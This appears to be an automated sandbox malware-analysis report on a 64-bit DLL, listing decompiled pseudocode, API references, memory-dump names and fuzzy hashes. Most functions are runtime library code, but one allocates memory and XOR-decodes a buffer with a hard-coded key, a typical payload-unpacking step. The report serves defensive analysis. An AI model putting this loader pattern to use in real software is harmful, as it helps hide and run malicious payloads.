Function 00007FFA0AE64194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA0AE64194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0xae641d5;
				if (_t5 == 0) goto 0xae641c9;
				if (_t5 == 0) goto 0xae641bc;
				if (__edx == 1) goto 0xae641b5;
				return 1;
			}

0x7ffa0ae64198
0x7ffa0ae6419a
0x7ffa0ae6419f
0x7ffa0ae641a4
0x7ffa0ae641a9
0x7ffa0ae641b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFA0AE641BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFA0AE64211
__scrt_fastfail.LIBCMT ref: 00007FFA0AE6422D
_RTC_Initialize.LIBCMT ref: 00007FFA0AE64245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFA0AE64267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFA0AE64283
__scrt_release_startup_lock.LIBCMT ref: 00007FFA0AE642AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFA0AE642CD

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 74aa52f232267798931cfa9a1c73f310239fe63fd737cdb062f07e0146c03895
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: F3514633E0866386FA54BB75FA412B926A0AF577C0F98C8B5E94D472D7FE2CE4458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE61580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0xae61693;
				r8d = 0;
				E00007FFA7FFA0AE61910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0xae6160a;
				E00007FFA7FFA0AE61850(_a16);
				_v56 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				if ((E00007FFA7FFA0AE62A50(_t49, _v56) & 0x000000ff) == 0) goto 0xae6160a;
				E00007FFA7FFA0AE61850(_a16);
				E00007FFA7FFA0AE61870(_t49, _a8, _t49);
				E00007FFA7FFA0AE61850(_a16);
				_v48 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				if ((E00007FFA7FFA0AE62A50(_t49, _v48) & 0x000000ff) == 0) goto 0xae6167a;
				E00007FFA7FFA0AE61A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFA7FFA0AE61AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFA7FFA0AE62A90(E00007FFA7FFA0AE62A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0xae61693;
				E00007FFA7FFA0AE62B00(_t41, _a16);
				return E00007FFA7FFA0AE61F00(_t49, _a8, _t49);
			}

0x7ffa0ae61580
0x7ffa0ae61585
0x7ffa0ae6158e
0x7ffa0ae61597
0x7ffa0ae615a1
0x7ffa0ae615a7
0x7ffa0ae615b1
0x7ffa0ae615bc
0x7ffa0ae615c3
0x7ffa0ae615c9
0x7ffa0ae615d3
0x7ffa0ae615ef
0x7ffa0ae615f6
0x7ffa0ae61604
0x7ffa0ae6160f
0x7ffa0ae61615
0x7ffa0ae6161f
0x7ffa0ae6163b
0x7ffa0ae61647
0x7ffa0ae6164d
0x7ffa0ae6165c
0x7ffa0ae61672
0x7ffa0ae61678
0x7ffa0ae6167f
0x7ffa0ae6169c

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE615F6

Part of subcall function 00007FFA0AE61870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA0AE615E4

Part of subcall function 00007FFA0AE62A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE62A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA0AE61630

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: 0782810b96c7e9e9df1f8b4f03adfc4ef786aca83d2c9f40eb33717db1119418
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: DD311033A5DA5181DA51FB32F45147FA351EBC67C0F049A75FA8D937AAEE2CE4008B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE62600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFA7FFA0AE62600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFA7FFA0AE62830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0xae62659;
				_v120 = _a16;
				goto 0xae62736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFA7FFA0AE62150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0xae62696;
				goto 0xae62736;
				E00007FFA7FFA0AE62150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFA7FFA0AE62830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFA7FFA0AE62150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0xae62724;
				E00007FFA7FFA0AE62150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFA7FFA0AE62150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0xae62736;
				E00007FFA7FFA0AE62830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE628E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0xae62771;
				if (_a24 <= 0) goto 0xae627b0;
				_t82 = E00007FFA7FFA0AE618F0(_t121, _a8);
				_v40 = _t121;
				E00007FFA7FFA0AE62C00(_t82, _v112);
				E00007FFA7FFA0AE611E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFA7FFA0AE61910(1, _t121, _a8, _a24);
				E00007FFA7FFA0AE62BC0(E00007FFA7FFA0AE62190(_a8), _t121);
				_v32 = _t121;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE62C10(_t121, _t121, _v32,  &_v112);
				E00007FFA7FFA0AE62150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFA7FFA0AE623A0(_t121, _a8, _a24);
			}

0x7ffa0ae62600
0x7ffa0ae62605
0x7ffa0ae6260a
0x7ffa0ae62616
0x7ffa0ae6262a
0x7ffa0ae6262e
0x7ffa0ae6263b
0x7ffa0ae62645
0x7ffa0ae6264f
0x7ffa0ae62654
0x7ffa0ae6265b
0x7ffa0ae62668
0x7ffa0ae62675
0x7ffa0ae6267c
0x7ffa0ae6268f
0x7ffa0ae62691
0x7ffa0ae6269e
0x7ffa0ae626a5
0x7ffa0ae626b0
0x7ffa0ae626bd
0x7ffa0ae626c7
0x7ffa0ae626ca
0x7ffa0ae626d7
0x7ffa0ae626e4
0x7ffa0ae626ee
0x7ffa0ae626f5
0x7ffa0ae62700
0x7ffa0ae6270d
0x7ffa0ae6271a
0x7ffa0ae6271d
0x7ffa0ae62722
0x7ffa0ae6272c
0x7ffa0ae62731
0x7ffa0ae6273b
0x7ffa0ae6273e
0x7ffa0ae6274b
0x7ffa0ae6275b
0x7ffa0ae62760
0x7ffa0ae62765
0x7ffa0ae6276a
0x7ffa0ae6276f
0x7ffa0ae6277a
0x7ffa0ae62784
0x7ffa0ae62789
0x7ffa0ae62793
0x7ffa0ae627ab
0x7ffa0ae627b0
0x7ffa0ae627bd
0x7ffa0ae627d2
0x7ffa0ae627d7
0x7ffa0ae627e4
0x7ffa0ae627f9
0x7ffa0ae62806
0x7ffa0ae62810
0x7ffa0ae6282f

APIs

Part of subcall function 00007FFA0AE62830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6283E
Part of subcall function 00007FFA0AE62830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA0AE6284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE6274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE6275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA0AE62784
char_traits.LIBCPMTD ref: 00007FFA0AE627AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE627E4
construct.LIBCPMTD ref: 00007FFA0AE627F9

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: 4a8507e9db286d2e59f439715c58d84f681c08169fa52b32f3a03fd9fa589af6
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: 8651FD32A1DB9585DA60EB61F4513AAA360FBCA7C0F408575EBCD87B5ADF3CD4008B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE61910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE61910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0xae61930;
				goto 0xae619f1;
				E00007FFA7FFA0AE62150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0xae619f1;
				E00007FFA7FFA0AE62190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFA7FFA0AE62BC0(E00007FFA7FFA0AE62190(_a8), _t47);
				_v32 = _t47;
				E00007FFA7FFA0AE61850(_a8);
				_t32 = E00007FFA7FFA0AE62BD0(_t47, _v32);
				if (_a24 <= 0) goto 0xae619bd;
				E00007FFA7FFA0AE62C00(_t32, _v40);
				_v24 = _t47;
				E00007FFA7FFA0AE62190(_a8);
				E00007FFA7FFA0AE611E0(_t47, _v24, _a24);
				E00007FFA7FFA0AE62150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFA7FFA0AE61850(_a8);
				E00007FFA7FFA0AE62100(_t49, _v40, _v16); // executed
				E00007FFA7FFA0AE62150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFA7FFA0AE623A0(_t49, _a8, _a24);
			}

0x7ffa0ae61910
0x7ffa0ae61915
0x7ffa0ae61919
0x7ffa0ae61929
0x7ffa0ae6192b
0x7ffa0ae61935
0x7ffa0ae6193e
0x7ffa0ae61949
0x7ffa0ae6194e
0x7ffa0ae61951
0x7ffa0ae61963
0x7ffa0ae61968
0x7ffa0ae61972
0x7ffa0ae61982
0x7ffa0ae6198d
0x7ffa0ae61994
0x7ffa0ae61999
0x7ffa0ae619a3
0x7ffa0ae619b8
0x7ffa0ae619c2
0x7ffa0ae619ca
0x7ffa0ae619cd
0x7ffa0ae619d7
0x7ffa0ae619ec
0x7ffa0ae619f6
0x7ffa0ae619fb
0x7ffa0ae61a15

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE61972
type_info::_name_internal_method.LIBCMTD ref: 00007FFA0AE61982
char_traits.LIBCPMTD ref: 00007FFA0AE619B8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA0AE619D7
_aligned_msize.LIBCMTD ref: 00007FFA0AE619EC

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: e3b0b8e42af8ff7b6d53b76a1b0f207c40669b9ae174379adeb3ae32f112ec39
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 6121CE73E1CA9181DA10FB62F8512AEA360FBC6BD4F004975FB8D8775AEE6CD4408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE613A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFA7FFA0AE613A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0xae613cd;
				E00007FFA7FFA0AE69764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0xae61475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0xae61409;
				E00007FFA7FFA0AE69764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0xae61435;
				E00007FFA7FFA0AE69764();
				if (_v40 - _v32 - 8 >= 0) goto 0xae61450;
				E00007FFA7FFA0AE69764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0xae6146b;
				E00007FFA7FFA0AE69764();
				_a8 = _v32;
				0xae64184(); // executed
				return __eax / _a24;
			}

0x7ffa0ae613a0
0x7ffa0ae613a5
0x7ffa0ae613aa
0x7ffa0ae613c6
0x7ffa0ae613c8
0x7ffa0ae613d8
0x7ffa0ae613e6
0x7ffa0ae613f1
0x7ffa0ae61402
0x7ffa0ae61404
0x7ffa0ae61412
0x7ffa0ae6141f
0x7ffa0ae6142e
0x7ffa0ae61430
0x7ffa0ae61449
0x7ffa0ae6144b
0x7ffa0ae61464
0x7ffa0ae61466
0x7ffa0ae61470
0x7ffa0ae6147a
0x7ffa0ae61483

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE613C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE6144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA0AE61466

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: 131340788814a859a47415e9bf54b3ac9a5eb0611bb4ca725407b60e4e1d260d
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: 6D211D37619B9481DA60EB69F48015EA7A4F7897E4F008A75FADD43BA9EF3CD1508B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE79510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA0AE79510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFA7FFA0AE691B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFA7FFA0AE691B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFA7FFA0AE691B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0xae7958f;
				goto 0xae795f4;
				_v40 = 0;
				goto 0xae795a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0xae795ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0xae79599;
				return _t48;
			}

0x7ffa0ae79510
0x7ffa0ae79514
0x7ffa0ae7951d
0x7ffa0ae79526
0x7ffa0ae7952d
0x7ffa0ae7953e
0x7ffa0ae7954e
0x7ffa0ae79559
0x7ffa0ae7956e
0x7ffa0ae79571
0x7ffa0ae79578
0x7ffa0ae7957e
0x7ffa0ae79589
0x7ffa0ae7958d
0x7ffa0ae7958f
0x7ffa0ae79597
0x7ffa0ae7959f
0x7ffa0ae795ab
0x7ffa0ae795ad
0x7ffa0ae795bb
0x7ffa0ae795c3
0x7ffa0ae795de
0x7ffa0ae795ea
0x7ffa0ae795ed
0x7ffa0ae795f8

APIs

VirtualAlloc.KERNELBASE ref: 00007FFA0AE79578

Strings

8192, xrefs: 00007FFA0AE79552
*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFA0AE79526
4096, xrefs: 00007FFA0AE79542

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 7229c913fcb9b7bb44c0352e5cc458db87c6c586ca01166e91777d2f1b8d48db
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: FB21F87261C6918BD764EB24F49066AB7A1FBC9754F40427AF68E83B69EF3CD5408F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE612B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA0AE612B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0xae612de;
				goto 0xae61397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0xae612f8;
				E00007FFA7FFA0AE64E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0xae6137c;
				if (_v32 - 0x1000 < 0) goto 0xae6137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0xae6133b;
				E00007FFA7FFA0AE64E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFA7FFA0AE63D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFA7FFA0AE69764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0xae61392;
				_t40 = E00007FFA7FFA0AE63D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFA7FFA0AE69764();
				return _t40;
			}

0x7ffa0ae612b0
0x7ffa0ae612b5
0x7ffa0ae612ba
0x7ffa0ae612c3
0x7ffa0ae612d2
0x7ffa0ae612d9
0x7ffa0ae612e7
0x7ffa0ae612f1
0x7ffa0ae612f3
0x7ffa0ae61303
0x7ffa0ae6130f
0x7ffa0ae6131a
0x7ffa0ae61325
0x7ffa0ae6132a
0x7ffa0ae61334
0x7ffa0ae61336
0x7ffa0ae61340
0x7ffa0ae61345
0x7ffa0ae6134c
0x7ffa0ae6135a
0x7ffa0ae6135e
0x7ffa0ae61368
0x7ffa0ae61376
0x7ffa0ae6137a
0x7ffa0ae61381
0x7ffa0ae61386
0x7ffa0ae6138d
0x7ffa0ae6139b

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA0AE612F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA0AE61336
new.LIBCMT ref: 00007FFA0AE61340

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: be035b680de02e6c05a0f7ee512ca309556300ce4d24455bc3046425c7704480
